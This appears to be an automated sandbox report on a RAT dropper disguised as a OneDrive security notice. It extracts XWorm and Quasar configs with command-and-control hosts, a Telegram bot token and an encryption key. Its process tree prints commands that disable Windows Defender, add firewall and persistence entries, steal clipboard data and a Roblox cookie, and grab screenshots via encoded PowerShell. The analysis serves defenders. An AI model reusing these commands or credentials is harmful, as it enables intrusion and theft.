Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-12-2024 14:02

General

  • Target

    OneDrive_Security_notification.exe

  • Size

    8.2MB

  • MD5

    630470e421acd1df856832d7a12b4853

  • SHA1

    72d9de36902b6bb8e7b0150c2371a0af341302c3

  • SHA256

    c2eb68974fb982502a2f497826f922563d90dfdf32725b44613aa1f957c8d0fd

  • SHA512

    6fa9f3887613ded84e53b655f84ca245483649e088e956289f15f9b5c3ad91271c395038ff39ec2dcc23415ab41e8bf8d2514f738b1a470c2e58e92d7763be41

  • SSDEEP

    196608:+sYqGogjHX3kH/6PJzxUJNuuSjlSTm0oon51jfHxMOpa+Sq:1sogjnQ61xQYxSTm0rHiWa+S

Malware Config

Extracted

Family

xworm

Version

3.1

C2

includes-ear.at.ply.gg:19669

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • telegram

    https://api.telegram.org/bot5946256736:AAHO4CrAGp_CXtFIt3jYlFOdvAaqBfQV7Qo/sendMessage?chat_id=5319807265

Extracted

Family

quasar

Version

1.3.0.0

Botnet

update64

C2

site-translations.at.ply.gg:19855

Mutex

QSR_MUTEX_WJxUvmtxNYm7LGjN3t

Attributes
  • encryption_key

    32vt5jMLvcowHkjxpyew

  • install_name

    update.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    update

  • subdirectory

    SubDir

Signatures

  • Detect Xworm Payload 2 IoCs
  • Njrat family
  • Quasar RAT 3 IoCs

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Drops startup file 4 IoCs
  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • UPX packed file 57 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\OneDrive_Security_notification.exe
    "C:\Users\Admin\AppData\Local\Temp\OneDrive_Security_notification.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3836
    • C:\Users\Admin\AppData\Roaming\Edge updater.exe
      "C:\Users\Admin\AppData\Roaming\Edge updater.exe"
      2⤵
      • Checks computer location settings
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      PID:5112
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Edge updater.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:4008
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Edge updater.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:1328
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Edge updater.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of AdjustPrivilegeToken
        PID:4536
    • C:\Users\Admin\AppData\Roaming\update.exe
      "C:\Users\Admin\AppData\Roaming\update.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3188
      • C:\Windows\SysWOW64\schtasks.exe
        "schtasks" /create /tn "update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\update.exe" /rl HIGHEST /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:2844
      • C:\Users\Admin\AppData\Roaming\SubDir\update.exe
        "C:\Users\Admin\AppData\Roaming\SubDir\update.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        PID:5104
        • C:\Windows\SysWOW64\schtasks.exe
          "schtasks" /create /tn "update" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\update.exe" /rl HIGHEST /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1048
    • C:\Users\Admin\AppData\Roaming\WindowsServices.exe
      "C:\Users\Admin\AppData\Roaming\WindowsServices.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:756
      • C:\ProgramData\WindowsServices.exe
        "C:\ProgramData\WindowsServices.exe"
        3⤵
        • Drops startup file
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4804
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall add allowedprogram "C:\ProgramData\WindowsServices.exe" "WindowsServices.exe" ENABLE
          4⤵
          • Modifies Windows Firewall
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3968
    • C:\Users\Admin\AppData\Roaming\WindowsSvhost.exe
      "C:\Users\Admin\AppData\Roaming\WindowsSvhost.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:760
      • C:\Users\Admin\AppData\Roaming\WindowsSvhost.exe
        "C:\Users\Admin\AppData\Roaming\WindowsSvhost.exe"
        3⤵
        • Drops file in Drivers directory
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3368
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSvhost.exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1348
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\WindowsSvhost.exe'
            5⤵
            • Quasar RAT
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1048
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2400
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious use of AdjustPrivilegeToken
            PID:1612
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1132
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1152
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1820
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:1992
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1596
          • C:\Windows\System32\Wbem\WMIC.exe
            WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:4996
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
          4⤵
          • Clipboard Data
          • Suspicious use of WriteProcessMemory
          PID:4868
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Get-Clipboard
            5⤵
            • Clipboard Data
            • Suspicious use of AdjustPrivilegeToken
            PID:4336
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2648
          • C:\Windows\system32\tasklist.exe
            tasklist /FO LIST
            5⤵
            • Enumerates processes with tasklist
            • Suspicious use of AdjustPrivilegeToken
            PID:4168
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "tree /A /F"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:3264
          • C:\Windows\system32\tree.com
            tree /A /F
            5⤵
              PID:1928
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
            4⤵
            • System Network Configuration Discovery: Wi-Fi Discovery
            • Suspicious use of WriteProcessMemory
            PID:1664
            • C:\Windows\system32\netsh.exe
              netsh wlan show profile
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              • System Network Configuration Discovery: Wi-Fi Discovery
              PID:628
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "systeminfo"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2472
            • C:\Windows\system32\systeminfo.exe
              systeminfo
              5⤵
              • Gathers system information
              PID:4688
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1472
            • C:\Windows\system32\reg.exe
              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              5⤵
                PID:2500
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3268
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                5⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4992
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1d5cpt5f\1d5cpt5f.cmdline"
                  6⤵
                    PID:2480
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7261.tmp" "c:\Users\Admin\AppData\Local\Temp\1d5cpt5f\CSC617DC35BB5B467293921E3F311DA4E2.TMP"
                      7⤵
                        PID:4024
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  4⤵
                    PID:1380
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      5⤵
                        PID:4392
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      4⤵
                        PID:3392
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          5⤵
                            PID:1076
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                          4⤵
                            PID:4608
                            • C:\Windows\system32\attrib.exe
                              attrib -r C:\Windows\System32\drivers\etc\hosts
                              5⤵
                              • Drops file in Drivers directory
                              • Views/modifies file attributes
                              PID:4540
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "tree /A /F"
                            4⤵
                              PID:4088
                              • C:\Windows\system32\tree.com
                                tree /A /F
                                5⤵
                                  PID:688
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                4⤵
                                  PID:3856
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                    5⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4552
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                  4⤵
                                    PID:3396
                                    • C:\Windows\system32\attrib.exe
                                      attrib +r C:\Windows\System32\drivers\etc\hosts
                                      5⤵
                                      • Drops file in Drivers directory
                                      • Views/modifies file attributes
                                      PID:2464
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                    4⤵
                                      PID:2312
                                      • C:\Windows\system32\tree.com
                                        tree /A /F
                                        5⤵
                                          PID:1104
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                        4⤵
                                          PID:3804
                                          • C:\Windows\system32\tasklist.exe
                                            tasklist /FO LIST
                                            5⤵
                                            • Enumerates processes with tasklist
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:328
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          4⤵
                                            PID:3668
